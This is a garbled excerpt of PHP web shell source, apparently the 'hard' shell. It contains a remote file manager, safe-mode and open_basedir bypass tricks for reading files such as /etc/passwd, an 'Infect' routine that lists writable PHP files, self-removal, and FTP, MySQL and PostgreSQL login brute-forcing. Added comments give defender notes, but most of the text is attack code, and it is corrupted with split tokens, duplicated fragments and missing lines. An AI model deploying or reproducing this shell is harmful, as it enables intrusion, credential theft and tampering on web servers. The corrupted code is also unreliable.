// Each uploaded part is moved to its client-supplied name; the destination is a relative
// path, so it resolves against the process's current working directory.
if (is_array ($ _ FILES [‘f’] [‘tmp_name’])) {
foreach ($ _FILES [‘f’] [‘tmp_name’] as $ i => $ tmpName) {
if (! @ move_uploaded_file ($ tmpName, $ _FILES [‘f’] [‘name’] [$ i])) {
echo “Can not upload file!”;
}
}
}
break;
case ‘mkdir’:
if (! @ mkdir ($ _ POST [‘p2’
])) echo “Can not create new dir”;
break;
case ‘delete’:
// Recursive delete: removes every entry under $path, then the directory itself.
function deleteDir ($ path) {
$ path = (substr ($ path, -1) == ‘/’)? $ path: $ path. ‘/’;
$ dh = opendir ($ path);
while (($? = readdir ($ dh))! == false) {
$? = $ path. $ ?;
if ((basename ($?) == “..”) || (basename ($?) == “.”))
continue;
$ type = filetype ($?);
if ($ type == “dir”)
deleteDir ($?);
else
@unlink ($?);
}
closedir ($ dh);
@rmdir ($ path);
}
// Selected names come URL-encoded in POST f[]; '..' is skipped before decoding.
if (is_array (@ $ _ POST [‘f’]))
foreach ($ _ POST [‘f’] as $ f) {
if ($ f == ‘..’)
continue;
$ f = urldecode ($ f);
if (is_dir ($ f))
deleteDir ($ f);
else
@unlink ($ f);
}
break;
case ‘paste’:
// The pending operation is whatever cookie 'act' says; sources are cookie 'c' (directory) plus
// each name in cookie 'f', and the destination is the current directory.
if ($ _ COOKIE [‘act’] == ‘copy’) {
function copy_paste ($ c, $ s, $ d) {
if (is_dir ($ c. $ s)) {
mkdir ($ d . $ s);
$ h = @opendir ($ c. $ s);
while (($ f = @readdir ($ h))! == false)
if (($ f! = “.”) and ($ f! = “..”))
copy_paste ($ c. $ s. ‘ / ‘, $ f, $ d. $ s.’ / ‘);
} elseif (is_file ($ c. $ s))
@copy ($ c. $ s, $ d. $ s);
}
foreach ($ _ COOKIE [‘f’] as $ f)
copy_paste ($ _ COOKIE [‘c’], $ f, $ GLOBALS [‘cwd’]);
} elseif ($ _ COOKIE [‘act’] == ‘move’) {
// NOTE(review): move_paste() is declared here, but the loop after it calls rename() directly;
// a line of its body is also missing from this copy.
function move_paste ($ c, $ s, $ d) {
if (is_dir ($ c. $ s)) {
mkdir ($ d. $ s) ;
$ h = @opendir ($ c. $ s);

if (($ f! = “.”) and ($ f! = “..”))
copy_paste ($ c. $ s. ‘/’, $ f, $ d. $ s. ‘/’);
} elseif (@is_file ($ c. $ s))
@copy ($ c. $ s, $ d. $ s);
}
foreach ($ _ COOKIE [‘f’] as $ f)
@rename ($ _ COOKIE [‘c’]. $ f, $ GLOBALS [‘cwd’]. $ f);
} elseif ($ _ COOKIE [‘act’] == ‘zip’) {
// Archive name comes from POST p2; files are added directly, directories through a recursive iterator.
if (class_exists (‘ZipArchive’)) {
$ zip = new ZipArchive ();
if ($ zip-> open ($ _ POST [‘p2’], 1)) {
chdir ($ _ COOKIE [‘c’]);
foreach ($ _ COOKIE [‘f’] as $ f) {
if ($ f == ‘..’)
continue;
if (@is_file ($ _ COOKIE [‘c’]. $ f))
$ zip-> addFile ($ _ COOKIE [‘c’]. $ f, $ f);
elseif (@is_dir ($ _ COOKIE [‘
$ iterator = new RecursiveIteratorIterator (new RecursiveDirectoryIterator ($ f. ‘/’, FilesystemIterator :: SKIP_DOTS));
foreach ($ iterator as $ key => $ value) {
$ zip-> addFile (realpath ($ key), $ key);
}
}
}
chdir ($ GLOBALS [‘cwd’]);
$ zip-> close ();
}
}
} elseif ($ _ COOKIE [‘act’] == ‘unzip’) {
// Every selected archive is extracted into the current directory.
if (class_exists (‘ZipArchive’)) {
$ zip = new ZipArchive ();
foreach ($ _ COOKIE [‘f’] as $ f) {
if ($ zip-> open ($ _ COOKIE [‘c’]. $ f)) {
$ zip-> extractTo ($ GLOBALS [‘cwd’]);
$ zip-> close ();
}
}
}
} elseif ($ _ COOKIE [‘act’] == ‘tar’

// NOTE(review): the start of the tar branch is missing from this copy. What remains passes the
// archive name and each selected name through escapeshellarg() before handing them to ex().
$ _COOKIE [‘f’] = array_map (‘escapeshellarg’, $ _COOKIE [‘f’]);
ex (‘tar cfzv’. escapeshellarg ($ _ POST [‘p2’]). ”. implode (”, $ _COOKIE [‘f’]));
chdir ($ GLOBALS [‘cwd’]);
}
// The clipboard is cleared once a paste has run.
unset ($ _ COOKIE [‘f’]);
setcookie (‘f’, ”, time () – 3600);
break;
default:
// Any other p1 value (copy, move, zip, ...) is only recorded on the client for a later paste.
if (! empty ($ _ POST [‘p1’])) {
prototype (‘act’, $ _POST [‘p1’]);
prototype (‘f’, serialize (@ $ _ POST [‘f’])));
prototype (‘c’, @ $ _ POST [‘c’]);
}
break;
}
}
hardHeader ();
echo ‘<h1> File manager </ h1> <div class = content> <script> p1_ = p2_ = p3 _ = “”; </ script> ‘;
$ dirContent = hardScandir (isset ($ _ POST [‘c’])? $ _ POST [‘c’]: $ GLOBALS [‘cwd’]);
if ($ dirContent === false) {echo ‘Can \’ t open this folder! ‘; hardFooter (); return; }
// Sort column and direction default to name/ascending; a p1 matching the s_<column>_<digit>
// pattern below overrides them.
global $ sort;
$ sort = array (‘name’, 1);
if (! empty ($ _ POST [‘p1’])) {
if (preg_match (‘! s _ ([Az] +) _ (\ d {1})!’, $ _POST [‘p1’], $ match) )
$ sort = array ($ match [1], (int) $ match [2]);
}
echo “<script>
function sa () {
for (i = 0; i <d.files.elements.length; i ++)
if (d.files.elements [i] .type == ‘checkbox’)
d.files .elements [i] .checked = d.files.elements [0] .checked;
}
</ script>
<table width = ‘100%’ class = ‘main’ cellspacing = ‘0’ cellpadding = ‘2’>
<form name = files method = post> <tr> <th width = ’13px’> <input type = checkbox onclick = ‘sa ()’ class = chkbx> </ th> <th> <a href = ‘#’ onclick = ‘g (\ “FilesMan \”, null, \ “s_name _”. ($ sort [1]? 0: 1). “\”)’> Name </a> </ th> <th> <a href = ‘#’ onclick = ‘g (\ “FilesMan \”, null, \ “s_size _”. ($ sort [1]? 0: 1). “\”)’> Size </a> </ th> <th> <a href=’#’onclick=’g(\”FilesMan\”, null,\”s_modify_”.($sort[1]?0:1).”\”>’> Modify </ a > </ th> <th> Owner / Group </ th> <th> <a href = ‘#’ onclick = ‘g (\ “FilesMan \”, null, \ “s_perms _”. ($ sort [1]? 0: 1). “\”) ‘> Permissions </a> </ th> <th>Actions </ th> </ tr> “;
// One record per directory entry: name, path, mtime, permissions, size, owner and group
// (numeric ids are used when the posix lookup returns no name).
$ dirs = $ files = array ();
$ n = count ($ dirContent);
for ($ i = 0; $ i <$ n; $ i ++) {
$ ow = @posix_getpwuid (@fileowner ($ dirContent [$ i]));
$ gr = @posix_getgrgid (@filegroup ($ dirContent [$ i]));
$ tmp = array (‘name’ => $ dirContent [$ i],
‘path’ => $ GLOBALS [‘cwd’]. $ dirContent [$ i],
‘modify’ => date (‘Ymd H: i: s’, @filemtime ($ GLOBALS [‘cwd’]. $ dirContent [ $ i])),
‘perms’ => viewPermsColor ($ GLOBALS [‘cwd’]. $ dirContent [$ i]),
‘size’ => @filesize ($ GLOBALS [‘cwd’]. $ dirContent [$ i ]),
‘owner’ => $ ow [‘name’]? $ ow [‘name’]: @ fileowner ($ dirContent [$ i]),
‘group’ => $ gr [‘name’]? $ gr [‘name’]: @ filegroup ($ dirContent [$ i])
);
if (@is_file ($ GLOBALS [‘cwd’]. $ dirContent [$ i]))
$ files [] = array_merge ($ tmp, array (‘type’ => ‘file’));
elseif (@is_link ($ GLOBALS [‘cwd’]. $ dirContent [$ i]))
$ dirs [] = array_merge ($ tmp, array (‘type’ => ‘link’, ‘link’ => readlink ($ tmp [‘path’])));
elseif (@is_dir ($ GLOBALS [‘cwd’]. $ dirContent [$ i]) && ($ dirContent [$ i]! = “.”))
$ dirs [] = array_merge ($ tmp, array (‘type’ => ‘dir’));
}
$ GLOBALS [‘sort’] = $ sort;
// Comparator for usort(): case-insensitive string compare on the chosen column, numeric compare
// for 'size'; the second element of $sort flips the direction.
function cmp ($ a, $ b) {
if ($ GLOBALS [‘sort’] [0]! = ‘size’)
return strcmp (strtolower ($ a [$ GLOBALS [‘sort’] [0]]), strtolower ($ b [$ GLOBALS [‘sort’] [0]])) * ($ GLOBALS [‘sort’] [1]? 1: -1);
else
return (($ a [‘size’] <$ b [‘size’])? -1: 1) * ($ GLOBALS [‘sort’] [1]? 1: -1);
}
usort ($ files, “cmp”);
usort ($ dirs, “cmp”);
// Directories and links are listed first, then regular files.
$ files = array_merge ($ dirs, $ files);
$ l = 0;
foreach ($ files as $ f) {
echo ‘<tr’. ($ l? ‘class = l1’: ”). ‘> <td> <input type = checkbox name = “f []” value = “‘. urlencode ($ f [‘name’ ]). ‘”class = chkbx> </ td> <td> <a href = # onclick =”‘. (($ f [‘type’] == ‘file’)? ‘g (\’ FilesTools \ ‘ , null, \ ”. urlencode ($ f [‘name’]). ‘\’, \ ‘view \’) “> ‘. htmlspecialchars ($ f [‘ name ‘]):’ g (\ ‘FilesMan \ ‘, \’ ‘. $ f [‘ path ‘].’ \ ‘); “‘. (empty ($ f [‘link’])? ”:” title = ‘{$ f [‘ link ‘]} ‘”).’> <b> [‘. htmlspecialchars ($ f [‘ name ‘]).’] </ b> ‘).’ </a> </ td> <td> ‘. (($ f [‘type’] == ‘file’)? viewSize ($ f [‘size’]): $ f [‘type’]). ‘</ td> <td> ‘. $ f [‘ modify ‘].’ </ td> <td> ‘. $ f [‘ owner ‘].’ / ‘. $ f [‘ group ‘].’ </ td> <td> <a href=# onclick=”g(\’FilesTools\’,null,\”.urlencode($f[‘name’]).’\’,\’chmod\’)”> ‘. $ f [‘ perms’]
. ‘</ td> <td> <a class = “tooltip” data-tooltip = “Rename” href = “#” onclick = “g (\’ FilesTools \ ‘, null, \”‘. urlencode ($ f [ ‘name’]). ‘\’, \ ‘rename \’) “> R </a> <a class =” tooltip “data-tooltip =” Touch “href =” # “onclick =” g (\ ‘FilesTools \ ‘, null, \’ ‘. urlencode ($ f [‘ name ‘]).’ \ ‘, \’ touch \ ‘) “> T </a>’. (($ f [‘type’] == ‘file’)? ‘<a class = “tooltip” data-tooltip = “Frame” href = “#” onclick = “g (\’ FilesTools \ ‘, null, \”‘. urlencode ($ f [‘name’ ]). ‘\’, \ ‘frame \’) “> F </a> <a class =” tooltip “data-tooltip =” Edit “href =” # “onclick =” g (\ ‘FilesTools \ ‘, null, \ “‘. Urlencode ($ f [‘name’]). ‘\’, \ ‘Edit \’)”> E </a> <a class = “tooltip” data-tooltip = ” Download “href =” # “onclick =” g (\ ‘FilesTools \’, null, \ ”. Urlencode ($ f [‘name’]). ‘\’, \ ‘Download \’) “> D </ a> ‘:’ ‘).’ </ td> </ tr> ‘;
$ l = $ l? 0: 1;
}
echo “<tr id = fak> <td colspan = 7>
<input type = hidden name = ne value = ”>download \ ‘) “> D </a>’: ”). ‘</ td> </ tr>’; $ l = $ l? 0: 1; } echo” <tr id = fak> <td colspan = 7> <input type = hidden name = ne value = ”>download \ ‘) “> D </a>’: ”). ‘</ td> </ tr>’; $ l = $ l? 0: 1; } echo” <tr id = fak> <td colspan = 7> <input type = hidden name = ne value = ”>
<input type = hidden name = a value = ‘FilesMan’>
<input type = hidden name = c value = ‘”. htmlspecialchars ($ GLOBALS [‘ cwd ‘]).”‘>
<input type = hidden name = charset value = ‘”. (isset ($ _ POST [‘ charset ‘])? $ _ POST [‘ charset ‘]:’ ‘).”‘>
<label> <select name = ‘p1’> “;
// "Paste" is offered only while a clipboard operation is pending in the cookies.
if (! empty ($ _COOKIE [‘act’]) && @count ($ _ COOKIE [‘f’]))
echo “<option value = ‘paste’>? Paste </ option> “;
echo” <option value = ‘copy’> Copy </ option> <option value = ‘move’> Move </ option> <option value = ‘delete’> Delete </ option> “;
if (class_exists (‘ZipArchive’))
echo “<

// For a pending zip/tar the form proposes an archive name of the form hard_<date>_<time>.<ext>.
if (! empty ($ _ COOKIE [‘act’]) && @count ($ _ COOKIE [‘f’]) && (($ _COOKIE [‘act’] == ‘zip’) || ($ _COOKIE [‘act’ ] == ‘tar’)))
echo “& nbsp; file name: <input type = text name = p2 value = ‘hard_”. date (“Ymd_His”). “.” . ($ _COOKIE [‘act’] == ‘zip’? ‘Zip’: ‘tar.gz’). “‘> & nbsp;”;
echo “<input type = ‘submit’ value = ‘submit’> </ td> </ tr> </ form> </ table> </ div>”;
hardFooter ();
}
function actionStringTools () {
if (! function_exists (‘hex2bin’)) {function hex2bin ($ p) {return decbin (hexdec ($ p));}}
if (! function_exists (‘binhex’

if (! function_exists (‘ascii2hex’)) {function ascii2hex ($ p) {$ r = ”; for ($ i = 0; $ i <strlen ($ p); ++ $ i) $ r. = sprintf (‘% 02X’, ord ($ p [$ i])); return strtoupper ($ r);}}
if (! Function_exists (‘full_urlencode’)) {function full_urlencode ($ p) {$ r = ”; for ($ i = 0; $ i <strlen ($ p); ++ $ i) $ r. = ‘%’. dechex (ord ($ p [$ i])); return strtoupper ($ r);} }
$ stringTools = array (
‘Base64 encode’ => ‘base64_encode’,
‘Base64 decode’ => ‘base64_decode’,
‘Url encode’ => ‘urlencode’,
‘Url decode’ => ‘urldecode’,
‘Full urlencode’ => ‘full_urlencode’,
‘md5 hash’ => ‘md5’,
‘sha1 hash’ => ‘sha1’,
‘crypt’ => ‘crypt’,
‘CRC32’ => ‘crc32’,
‘ASCII to HEX’ => ‘ascii2hex’,
‘HEX to ASCII’ => ‘hex2ascii’,
‘HEX to DEC’ => ‘hexdec’,
‘HEX to BIN’ => ‘hex2bin’,
‘DEC to HEX’ => ‘dechex’,
‘DEC to BIN’ => ‘decbin’,
‘BIN to HEX’ = > ‘binhex’,
‘BIN to DEC’ => ‘bindec’,
‘String to lower case’ => ‘strtolower’,
‘String to upper case’ => ‘strtoupper’,
‘Htmlspecialchars’ =>’ htmlspecialchars’,
‘ String length ‘=>’ strlen ‘,
);
if (isset ($ _ POST [‘ajax’])) {
prototype (md5 ($ _ SERVER [‘HTTP_HOST’]). ‘ajax’, true);
ob_start ();
if (in_array ($ _ POST [‘p1’],

$ temp = “document.getElementById (‘strOutput’). style.display = ”; document.getElementById (‘strOutput’). innerHTML = ‘”. addcslashes (htmlspecialchars (ob_get_clean ()), “\ n \ r \ t \\ ‘\ 0 “).”‘; \ N “;
echo strlen ($ temp), “\ n”, $ temp;
exit;
}
if (empty ($ _ POST [‘ajax’]) &&! empty ($ _ POST [‘p1’]))
prototype (md5 ($ _ SERVER [‘HTTP_HOST’]). ‘ajax’, 0);
hardHeader ();
echo ‘<h1> String conversions </ h1> <div class = content>’;
echo “<form name = ‘toolsForm’ onSubmit = ‘if (this.ajax.checked) {a (null, null, this.selectTool.value, this.input.value);} else {g (null, null, this .selectTool.value, this.input.value);} return false; ‘> <

echo “<option value = ‘”. htmlspecialchars ($ v). “‘>”. $ k. “</ option>”;
echo “</ select> </ label> <input type = ‘submit’ value = ‘submit’ /> <input type = checkbox name = ajax value = 1″. (@ $ _ COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’ ]). ‘ajax’]? ‘checked’: ”). “> send using AJAX <br> <textarea name = ‘input’ style = ‘margin-top: 5px’ class = bigarea>”. (empty ($ _POST [‘p1’])? ”: Htmlspecialchars (@ $ _ POST [‘p2’])). “” </ Textarea> </ form> <pre class = ‘ml1’ style = ‘”. (Empty ($ _ POST [‘p1’])? ‘display: none;’: ”). “margin-top: 5px ‘id =’ strOutput ‘>”;
if (! empty ($ _ POST [‘p1’
])) { if (in_array ($ _ POST [‘p1’], $ stringTools)) echo htmlspecialchars ($ _ POST [‘p1’] ($ _ POST [‘p2’]));
}
echo “</ pre> </ div> <br> <h1> Search files: </ h1> <div class = content>
<form onsubmit = \ “g (null, this.cwd.value, null, this.text.value, this.filename.value); return false; \”> <table cellpadding = ‘1’ cellspacing = ‘0’ width = ‘50% ‘>
<tr> <td width =’ 1% ‘> Text: </ td> <td> <input type =’ text ‘name =’ text ‘style =’ width: 100% ‘> </ td> </ tr>
<tr> <td> Path: </ td> <td> <input type = ‘text’ name = ‘cwd’ value = ‘”. htmlspecialchars ($ GLOBALS [‘ cwd ‘]).” ‘style =’ width: 100% ‘> </ td> </ tr>
<tr> <td> Name: </ td> <td> <input type =’ text ‘name =’ filename ‘value =’ * ‘ style = ‘width: 100%’> </ td> </ tr>
<tr> <td> </ td> <td> <input type = ‘submit’ value = ‘submit’> </ td> </ tr>
</ table> </ form> “;
/**
 * Recursive search behind the "Search files" form: under $path it collects names matching the
 * glob pattern in $_POST['p3'] plus every sub-directory, descends into the directories, and
 * prints a link for each file - all files when $_POST['p2'] is empty, otherwise only those
 * whose contents contain that string.
 *
 * Defender note: with a text filter set, each candidate file is read in full through
 * file_get_contents(), so a search appears as a burst of reads across the tree by the PHP
 * worker; file-access auditing on configuration and credential files will record it.
 */
function hardRecursiveGlob ($ path) {
// Normalise the directory to end with a slash before building glob patterns from it.
if (substr ($ path, -1)! = ‘ / ‘)
$ path. =’ / ‘;
$ paths = @array_unique (@array_merge (@glob ($ path. $ _ POST [‘p3’]), @glob ($ path. ‘*’, GLOB_ONLYDIR)));
if (is_array ($ paths) && @ count ($ paths)) {
foreach ($ paths as $?) {
if (@is_dir ($?)) {
// Guard against recursing into the directory currently being scanned.
if ($ path! = $?)
hardRecursiveGlob ($?);
} else {
if (empty ($ _ POST [‘p2’])) || @strpos (file_get_contents ($?), $ _POST [‘p2’])! == false)
echo “<a href = ‘#’ onclick = ‘g (\ “FilesTools \”, null, \ “”. urlencode ($?). “\”, \ “view \”, \ “\”)’> “. htmlspecialchars ($?).” </ a > <br> “;
}
}
}
}
if (@ $ _ POST [‘p3’])
hardRecursiveGlob ($ _ POST [‘c’]);
echo “<

<input type = ‘text’ name = ‘hash’ style = ‘width: 200px;’> <br>
<input type = ‘hidden’ name = ‘act’ value = ‘find’ />
<input type = ‘submit’ value = ‘hashcracking.ru’ onclick = \ “document.hf.action = ‘https: //hashcracking.ru/index.php’; document.hf.submit () \”> <br>
<input type = ‘submit ‘value =’ md5.rednoize.com ‘onclick = \ “document.hf.action =’ http: //md5.rednoize.com/? q = ‘+ document.hf.hash.value +’ & s = md5 ‘; document .hf.submit () \ “> <br>
<input type = ‘submit’ value = ‘fakenamegenerator.com’ onclick = \” document.hf.action = ‘http: //www.fakenamegenerator.com/’; document .hf.submit () \ “> <br>
<input type = ‘submit ‘value =’ hashcrack.com ‘onclick = \ “document.hf.action =’ http: //www.hashcrack.com/index.php ‘; document.hf.submit () \”> <br>
if (@copy (“compress.zlib: //”. $ _ POST [‘p2’], $ temp)) { echo @file_get_contents ($ temp); unlink ($ temp); } else

echo ‘Sorry … Can \’ t open file ‘;
break;
case 2:
$ files = glob ($ _ POST [‘p2’]. ‘*’);
if (is_array ($ files))
foreach ($ files as $ filename)
echo $ filename. “\ n”;
break;
case 3:
$ ch = curl_init (“file: //”. $ _ POST [‘p2’]. “\ x00” .SELF_PATH);
curl_exec ($ ch);
break;
case 4:
ini_restore (“safe_mode”);
ini_restore (“open_basedir”);
include ($ _ POST [‘p2’]);
break;
case 5:
for (; $ _ POST [‘p2’] <= $ _ POST [‘p3’]; $ _ POST [‘p2’] ++) {
$ uid = @posix_getpwuid ($ _ POST [‘p2’]);
if ($ uid)
echo join (‘:’, $ uid). “\ n”;
}
break;
case 6:
if (! function_exists (‘imap_open’)) break;
$ stream = imap_open ($ _ POST [‘p2’], “”, “”);
if ($ stream == FALSE)
break;
echo imap_body ($ stream, 1);
imap_close ($ stream);
break;
}
$ temp = ob_get_clean ();
hardHeader ();
echo ‘<h1> Safe mode bypass </ h1> <div class = content>’;
echo ‘<span> Copy (read file) </ span> <form onsubmit = \’ g (null, null, “1”, this.param.value); return false; \ ‘> <input class = “toolsInp” type = text name = param> <input type = submit value = “submit”> </ form> <br> <span> Glob (list dir) </ span> <form onsubmit = \ ‘g (null, null, ” 2 “, this.param.value); return false; \ ‘> <input class =” toolsInp “type = text name = param> <input type = submit value =” submit “> </ form> <br> <span > Curl (read file) </ span> <form onsubmit = \ ‘g (null, null, “3”, this.param.value); return false; \’> <input class = “toolsInp” type = text name = param> <input type = submit value = “submit”> </ form> <br> <span> Ini_restore (read file) </ span> <form onsubmit = \ ‘g (null, null, “4”, this.param.value); return false; \’> <input class = “toolsInp” type = text name = param> <input type = submit value = ” submit “> </ form> <br> <span> Posix_getpwuid (” Read “/ etc / passwd) </ span> <table> <form onsubmit = \ ‘g (null, null,” 5 “, this.param1. value, this.param2.value); return false; \ ‘> <tr> <td> From </ td> <td> <input type = text name = param1 value = 0> </ td> </ tr> < tr> <td> To </ td> <td> <input type = text name = param2 value = 1000> </ td> </ tr> </ table> <input type = submit value = “submit”> </ form> <br> <br> <span> Imap_open (read file) </ span> <form onsubmit = \ ‘g (null, null, “6”, this.param.value); return false;\ ‘> <input type = text name = param> <input type = submit value = “submit”> </ form>’;
if ($ temp)
echo ‘<pre class = “ml1” style = “margin-top: 5px” id = “Output”>’. $ temp. ‘</ pre>’;
echo ‘</ div>’;
hardFooter ();
}
/**
 * Logout action: expires the cookie named md5(HTTP_HOST) and ends the request with 'bye!'.
 *
 * Defender note: the cookie name is the 32-hex-character MD5 of the Host header, so it can be
 * computed for a given virtual host and searched for in proxy or WAF captures. Presumably this
 * is the shell's login cookie, set by code outside this excerpt - confirm against the full file.
 */
function actionLogout () {
// An expiry one hour in the past makes the browser drop the cookie.
setcookie (md5 ($ _ SERVER [‘HTTP_HOST’]), ”, time () – 3600);
die (‘bye!’);
}
/**
 * Self-removal action: when $_POST['p1'] is 'yes' it unlinks the script's own file and stops
 * with 'Shell has been removed'; otherwise it prints a confirmation prompt.
 *
 * The file name is __FILE__ with a trailing "(digits) <text>" suffix stripped by the regex -
 * presumably the suffix PHP adds to __FILE__ inside eval()'d code; confirm before relying on it.
 *
 * Incident-response notes:
 *  - A missing file is not evidence that no shell was present. Web-server access logs, backups
 *    and filesystem snapshots are the sources that survive this action, so preserve them early.
 *  - Only this one file is removed; anything else changed on the host while the shell was in
 *    place is untouched and still has to be hunted for.
 */
function actionSelfRemove () {
if ($ _ POST [‘p1’] == ‘yes’)
if (@unlink (preg_replace (‘! \ (\ d + \) \ s. *!’, ”, __FILE__)))
die (‘Shell has been removed’);
else
// This else pairs with the unlink() test above: deletion was requested but failed.
echo ‘unlink error!’;
if ($ _ POST [‘p1’]! = ‘yes’)
hardHeader ();
echo ‘<h1> Suicide </ h1> < div class = content> Really want to remove the shell? <br> <a href=# onclick=”g(null,null,\’yes\’)”> Yes </a> </ div> ‘;
hardFooter ();
}
/**
 * "Infect" action. In this copy the confirmed branch only enumerates: it walks DOCUMENT_ROOT
 * recursively, prints every file ending in '.php' that is writable and is not the current
 * script, and prints the count. No write to those files appears in the visible code.
 *
 * Defender notes:
 *  - The printed list is exactly the set of PHP files the worker account can modify. A docroot
 *    where application code is owned by a deploy user and read-only for the worker leaves it empty.
 *  - Treat every file on that list as suspect after an incident: compare against version control
 *    or a known-good package rather than trusting modification times.
 *  - File-integrity monitoring on *.php under the docroot is the matching detective control.
 */
function actionInfect () {
hardHeader ();
echo ‘<h1> Infect </ h1> <div class = content>’;
if ($ _ POST [‘p1’] == ‘infect’) {
$ target = $ _ SERVER [‘DOCUMENT_ROOT’];
// Depth-first directory walk returning a flat list of file paths under $dir.
function ListFiles ($ dir) {
if ($ dh = opendir ($ dir)) {
$ files = Array ();
$ inner_files = Array ();
while ($ file = readdir ($ dh)) {
if ($ file! = “.” && $ file! = “..”) {
if (is_dir ($ dir. “/”. $ file)) {
$ inner_files = ListFiles ($ dir. “/”. $ File);
if (is_array ($ inner_files)) $ files = array_merge ($ files, $ inner_files);
} else {
array_push ($ files, $ dir. “/”. $ file);
}
}
}
closedir ($ dh);
return $ files;
}
}
foreach (ListFiles ($ target) as $ key => $ file) {
// Extension test on the last four characters of the path.
$ nFile = substr ($ file, -4, 4);
if ($ nFile == “.php”) {
// Skip the running script itself; keep only files the worker can write to.
if (($ file <> $ _ SERVER [‘DOCUMENT_ROOT’]. $ _ SERVER [‘PHP_SELF’]) && (is_writeable ($ file))) {
echo “$ file < br> “;
// $i is never initialised in the visible code; the first increment starts from an unset variable.
$ i ++;
}
}
}
echo “<font color = red size = 14> $ i </ font>”;
} else {
echo “<form method = post> <input type = submit value = Infect name = infet> </ form>”;
echo ‘Really want to infect the server? & nbsp; <a href=# onclick=”g(null,null,\’infect\’)”> Yes </a> </ div>’;
}
hardFooter ();
}
/**
 * Credential-guessing action against an FTP, MySQL or PostgreSQL service named in
 * $_POST['server'] (host[:port]; the form defaults to 127.0.0.1).
 *
 * $_POST['proto'] selects which bruteForce() helper gets declared. $_POST['type'] selects the
 * candidate source: 1 = account names read from /etc/passwd, each tried with the name itself as
 * the password and, if 'reverse' is set, with the name reversed; 2 = one login ($_POST['login'])
 * tried against every line of the file in $_POST['dict'].
 *
 * Defender notes:
 *  - Attempts originate from the web host itself, often over loopback, so perimeter controls do
 *    not see them. The service logs do: look for runs of failed logins from 127.0.0.1 or the
 *    web server's address in FTP and database authentication logs.
 *  - Password-equals-username and its reverse are the only guesses in mode 1; a password policy
 *    that rejects passwords derived from the account name removes that mode's yield.
 *  - Per-source rate limiting or lockout on the FTP and database services, and database accounts
 *    bound to specific client hosts, limit what a compromised web tier can reach.
 *  - A file named passwd.dic next to web content is an artefact worth searching for.
 */
function actionBruteforce () {
hardHeader ();
if (isset ($ _ POST [‘proto’])) {
echo ‘<h1> Results </ h1> <div class = content> <span> Type: </ span>’ .htmlspecialchars ($ _ POST [‘proto’]). ‘ <span> Server: </ span> ‘.htmlspecialchars ($ _ POST [‘ server ‘]).’ <br> ‘;
// Each branch declares bruteForce() for one protocol: one connection and one login per call,
// returning whether the login succeeded.
if ($ _POST [‘proto’] == ‘ftp’) {
function bruteForce ($ ip, $ port, $ login, $ pass) {
$ fp = @ ftp_connect ($ ip, $ port? $ port: 21);
if (! $ fp) return false;
$ res = @ftp_login ($ fp, $ login, $ pass);
@ftp_close ($ fp);
return $ res;
}
} elseif ($ _POST [‘proto’] == ‘mysql’) {
function bruteForce ($ ip, $ port, $ login, $ pass) {
$ res = @mysql_connect ($ ip. ‘:’. ($ port ? $ port: 3306), $ login, $ pass);
@mysql_close ($ res);
return $ res;

// NOTE(review): the end of the MySQL helper and the condition opening the next branch
// (presumably proto == 'pgsql') are missing from this copy.
function bruteForce ($ ip, $ port, $ login, $ pass) {
$ str = “host = ‘”. $ ip. “‘ port = ‘”. $ port. “‘ user = ‘”. $ login. “‘ password = ‘”. $ pass.”‘ dbname = postgres “;
$ res = @pg_connect ($ str);
@pg_close ($ res);
return $ res;
}
}
$ success = 0;
$ attempts = 0;
$ server = explode (“:”, $ _POST [‘server’]);
// Mode 1: the first field of each /etc/passwd line is used as both login and password.
if ($ _ POST [‘type’] == 1) {
$ temp = @file (‘/ etc / passwd’);
if (is_array ($ temp))
foreach ($ temp as $ line) {
$ line = explode (“:”, $ line);
++ $ attempts;
if (bruteForce (@ $ server [0], @ $ server [1], $ line [0], $ line [0])) {
$ success ++;
echo ‘<b>’. htmlspecialchars ($ line [0]). ‘</ b>:’. htmlspecialchars ($ line [0]). ‘<br>’;
}
// Optional second guess per account: the login name spelled backwards.
if (@ $ _ POST [‘reverse’]) {
$ tmp = “”;
for ($ i = strlen ($ line [0]) – 1; $ i> = 0; – $ i)
$ tmp. = $ line [0] [$ i];
++ $ attempts;
if (bruteForce (@ $ server [0], @ $ server [1], $ line [0], $ tmp)) {
$ success ++;
echo ‘<b>’. htmlspecialchars ($ line [0]). ‘</ b>:’. htmlspecialchars ($ tmp);
}
}
}
// Mode 2: a fixed login against each trimmed line of a server-side dictionary file.
} elseif ($ _ POST [‘type’] == 2) {
$ temp = @file ($ _ POST [‘dict’]);
if (is_array ($ temp))
foreach ($ temp as $ line) {
$ line = trim ($ line);
++ $ attempts;
if (bruteForce ($ server [0], @ $ server [1], $ _POST [‘login’], $ line)) {
$ success ++;
// NOTE(review): the next statement is cut off in this copy of the page.
echo ‘<b>’. htmlspecialchars ($ _ POST [‘
}
}
}
echo “<span> Attempts: </ span> $ attempts <span> Success: </ span> $ success </ div> <br>”;
}
// Input form; part of its markup is missing from this copy.
echo ‘<h1> FTP bruteforce </ h1> <div class = content> <table> <form method = post> <tr> <td> <span> Type </ span> </ td>’
. ‘<td > <label> <select name = proto> <option value = ftp> FTP </ option> <option value = mysql> MySql </ option> <option value = pgsql> PostgreSql </ option> </ select> </ label > </ td> </ tr> <tr> <td> ‘
.’ <input type = hidden name = c value = “‘. htmlspecialchars ($ GLOBALS [‘ cwd ‘]).'”> ‘
.’ <input type = hidden name = a value = “‘.

. ‘<td> <input type = text name = server value = “127.0.0.1”> </ td> </ tr>’
. ‘<tr> <td> <span> Brute type </ span> </ td > ‘
.’ <td> <input type = radio name = type value = “1” checked> / etc / passwd </ td> </ tr> ‘
.’ <tr> <td> </ td> <td style = “padding-left: 15px”> <input type = checkbox name = reverse value = 1 checked> reverse (login -> nigol) </ td> </ tr> ‘
.’ <tr> <td> </ td> <td> <input type = radio name = type value = “2”> Dictionary </ td> </ tr> ‘
.’ <tr> <td> </ td> <td> <table style = “padding-left : 15px “> <tr> <td> <span> Login </ span> </ td> ‘
.’ <td> <input type = text name = login value = “root”> </ td> </ tr> ‘
.’ <tr> <td> <span> Dictionary </ span> </ td> ‘
.’ <td> <input type = text name = dict value = “‘. htmlspecialchars ($ GLOBALS [‘ cwd ‘]).’ passwd.dic”> </ td> </ tr> </ table> ‘
. ‘</ td> </ tr> <tr> <td> </ td> <td> <input type = submit value = “submit”> </ td> </ tr> </ form> </ table> ‘;
echo ‘</ div>’;
hardFooter ();
}
function actionSql () {
class DbClass {
var $ type;
var $ link;
var $ res;
// PHP 4-style constructor (a method named after the class): stores the backend
